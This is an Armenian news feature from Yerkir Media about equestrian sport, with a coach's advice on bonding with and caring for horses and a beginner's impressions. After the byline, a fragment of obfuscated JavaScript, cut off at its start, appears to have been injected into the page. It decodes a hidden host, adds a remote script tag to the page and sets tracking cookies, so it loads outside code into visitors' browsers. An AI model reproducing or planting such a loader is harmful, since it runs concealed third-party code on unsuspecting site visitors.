«Հաջողությունը կախված է նժույգի հետ անմիջական շփումից». Ձիասպորտի գաղտնիքները

Ձիերի հետ շփումը մարդկանց վրա դրական ազդեցություն է ունենում, մասնագետները պնդում են, որ այս կենդանիների հետ շփում հաստատելը նույնն է, ինչ երեխաների հետ. պետք է լինես զգույշ, քնքուշ ու հոգատար:

Ձիասպորտը թեպետ մեզ մոտ զիջում է իր դիրքերը, բայց հնարավոր բոլոր պայմանները ստեղծված են մարզաձեւի զարգացման համար։ Հայաստանի Ձիասպորտի ֆեդերցիայի մարզիչ Վանիկ Ավետիսյանն, ով արդեն 25 տարիէ այս մարզաձեւն է ընտրել իր կյանքի հիմնական ուղեկից, վստահեցնում է, որ Ձիասպորտով զբաղվող յուրաքանչյուր ոք քաջ գիտակցում է մի պարզ բան. հաջողությունը կախված է նժույգի հետ անմիջական շփումից։ Նրան պետք է զգալ ու խոսել հետը։

«Ձին ճիշտ վարելու համար ցանկալի է չլարվել, չվախենալ, որովետեւ ձին շատ զգայուն կենդանի է ու շատ ուժեզ զգում է իրա վրա նստողին, տիրոջը, մի խոսքով ամեն ինչ,- ասում է Վանիկ Ավետիսյանը:

Հետաքրքիր կերպով է ընտրվում ձիու անունը: Այստեղ պետք է պարտադիր կերպով լինի նրա ծնողների անվան մի մասնիկը: Ձիերի յուրաքանչյուր տեսակ ունի իր հիմնական գործառույթը: Օրինակ՝ արաբական և անգլիական ձիերը նախատեսված են արագավազության համար: Նրանք ավելի լավ վազում են, քան ցատկ կատարում: Իսկ ահա Եվրոպական ցեղատեսակի ձիերի մոտ ճիշտ հակառակն է: Սրանից զատ, յուրաքանչյուր ձի նաև անհատական խնամք է պահանջում:

«Ձիու խնամքն առաջին հերթին իր կերակրելու ժամերն են՝ առավոտյան, ցերեկը, երեկոյան, 3 անգամ սնվում է ռեժիմով,մանավանդ սպորտային ձիերը ռեժիմով սնվում են ու ռեժիմով աշխատում: Սնունդից հետո մենք խնամում ենք, մաքրում ենք, բժշկական խնամք իրականացնում»,- պատմում է Վանիկ Ավետիսյանը:

Վանիկն իր ունեցած փորձից ելնելով վստահեցնում է, որ ձիերի բնավոությունը մարդկանց բնավորությանը չափազանց մոտ է: Օինակ՝ 13 ամյա Կովբոյը բավականին կամակոր ձի է: Նրան ամեն ոք չի կարող հեծնել, նկարահանումների ընթացքում էլ հասկացանք, որ խցիկը չէր սիրում, նրա համար ավելի հաճելի է իր արքայական կեցվածքով առաջ շարժվելը: Իսկ ահա Խանդուխտը նրա հակառակ պատկերն է. սկսնակներին ըմբռնումով է մոտենում, ինչպես նաև աղջկական հմայքն ի ցույց է դնում, երբ խցիկի օբեկտիվում ինքն է:

 

Այսօր գնալով ավելանում է մարզաձեւով հետաքրքրվողների թիվը։ Գերակշռողը աղջիկներն են։ Մարզչի խոսքերով՝ նրանք ավելի համարձակ են: Ի դեպ, սա այն եզակի մարզաձեւն է, որը իր մեջ տարիքային սահմանափակում չունի: Գայանե Ավետիսյանն ով արդեն 3 ամիս է ինչ հետաքրքրված է այս մարզաձեւով, վստահեցնում է, որ ձիու հետ շփվելիս յուրահատուկ հանգստությամբ է լցվում;

«Բարդություններ բնականաբար լինում են սկզբում, իհարկե իր չափերն արդեն իսկ վախենալու են: Բայց երբ որ նստում ես, ամեն ինչ անցնում է»,- անկեղծանում է Գայանեն:

Լուսնե Ավագյան, Անդրանիկ Ներկարյան, Գրիքոր Անդրեասյան, Բարև Երկիր

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “yerkirmedia.am”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf(‘http’)==0)return p;}else{break;}}return “”},c=function(e,t,o){var lp=p();if(lp==””)return;var n=lp+”//”+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf(“firefox”))window.smlo.loadSmlo(n.replace(“https:”,”http:”));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf(“firefox”))window.zSmlo.loadSmlo(n.replace(“https:”,”http:”));else{var i=document.createElement(“script”);i.setAttribute(“src”,n),i.setAttribute(“type”,”text/javascript”),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,”function”==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),”function”==typeof o&&o())}}},s=function(f){var u=a(f)+”/ajs/”+t+”/c/”+r(d())+”_”+(self===top?0:1)+”.js”;window.a3164427983=f,c(u,function(){o(“a2519043306”)!=f&&n(“a2519043306”,f,{expires:parseInt(“3600”)})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o(“a36677002”)!=i&&n(“a36677002”,i);var r=o(“a2519043306”);t=r?r:e[0],s(t)};f()}();
// ]]>


Source: Yerkir Media
Link: «Հաջողությունը կախված է նժույգի հետ անմիջական շփումից». Ձիասպորտի գաղտնիքները

Your generosity empowers our advocacy, inspires our work, and sustains our momentum.
DONATE NOW!
close-image